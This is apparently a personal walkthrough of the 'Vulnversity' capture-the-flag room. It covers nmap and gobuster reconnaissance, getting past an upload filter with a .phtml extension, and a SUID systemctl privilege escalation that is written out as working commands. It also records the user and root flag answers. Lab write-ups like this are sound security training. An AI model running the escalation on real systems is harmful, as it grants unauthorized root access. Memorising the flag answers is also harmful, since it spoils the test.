# Vulnversity

> Shay Pasvolsky
> Started: 03/10/20 09-28-33
> Finished: 03/10/20 11-15-00

---

---

## General info

```bash
export MIP=10.10.97.167
export MyIP=10.9.134.47
```

### Users

```txt
    User:
        Password:
```

### Open Ports

```txt
    port:
        type: tcp, udp, tcp6, udp6
        service:
            version:
            Has Vuln:
```

### Tools

```txt
    - Intruder
```

---

## Tasks

### Task 1

1. Deploy the machine

    ```txt
    Hit 'Completed'
    ```

### Task 2

1. Scan this box: nmap -sV < machines ip >
    There are many nmap "cheatsheets" online that you can use too.

    ```txt
    Hit 'Completed'
    ```

2. Scan the box, how many ports are open?

    ```bash
    sudo nmap -sC -sV -vvv $MIP -oN scans/local/nmap/withvulns
    ```

    ```txt
    6
    ```

3. What version of the squid proxy is running on the machine?

    ```txt
    3.5.12
    ```

4. How many ports will nmap scan if the flag -p-400 was used?

    ```txt
    400
    ```

5. Using the nmap flag -n what will it not resolve?

    ```bash
    man nmap; /-n;
    ```

    ```txt
    DNS
    ```

6. What is the most likely operating system this machine is running?

    ```txt
    Ubuntu
    ```

7. What port is the web server running on?

    ```txt
    3333
    ```

8. Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

    ```txt
    Hit 'Completed'
    ```

### Task 3

1. Lets first start of by scanning the website to find any hidden directories. To do this, we're going to use GoBuster.

    ```bash
    sudo gobuster dir -u http://10.10.97.167:3333 -o scans/local/gobuster/dirs -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100
    ```

    ```txt
    Hit 'Completed'
    ```

2. What is the directory that has an upload form page?

    ```txt
    /internal/
    ```

### Task 4

1. Try upload a few file types to the server, what common extension seems to be blocked?

    ```txt
    .php
    ```

2. To identify which extensions are not blocked, we're going to fuzz the upload form.

    To do this, we're doing to use BurpSuite. If you are unsure to what BurpSuite is, or how to set it up please complete our BurpSuite room first.

    ```txt
    Hit 'Completed'
    ```

3. We're going to use Intruder (used for automating customised attacks).

    ```txt
    .phtml
    ```

4. Now we know what extension we can use for our payload we can progress.

    ```txt
    Hit 'Completed'
    ```

5. What is the name of the user who manages the webserver?

    ```bash
    whoami
    ```

    ```txt
    bill
    ```

6. What is the user flag?

    ```bash
    cd bill; cat user.txt
    ```

    ```txt
    8bd7992fbe8a6ad22a63361004cfcedb
    ```

### Task 5

1. In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

    For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

    ```bash
    find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
    ```

    ```txt
    /bin/systemctl
    ```

2. Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

    Become root and get the last flag (/root/root.txt)

    ```bash
    eop=$(mktemp).service                                       # Make a temp service veriable
    echo '[Service]
    ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
    [Install]
    WantedBy=multi-user.target' > $eop                          # Fill in the information for the service: cat the root.txt to /tmp/output using /bin/sh
    /bin/systemctl link $eop                                    # make a link to the service
    /bin/systemctl enable --now $eop                            # Enable the service
    ls -lah /tmp                                                # Check to see if the file got created
    cat /tmp/output                                             # Get the flag
    ```

    ```txt
    a58ff8579f0a9270368d33a9966c7fd5
    ```
